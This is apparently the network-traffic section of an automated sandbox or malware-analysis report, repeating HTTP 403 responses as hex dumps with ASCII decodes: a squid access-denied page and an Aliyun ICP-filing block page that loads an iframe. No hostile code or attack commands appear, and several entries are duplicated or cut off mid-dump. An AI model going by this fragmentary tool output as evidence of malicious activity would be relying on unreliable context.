                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:20 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:20 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" 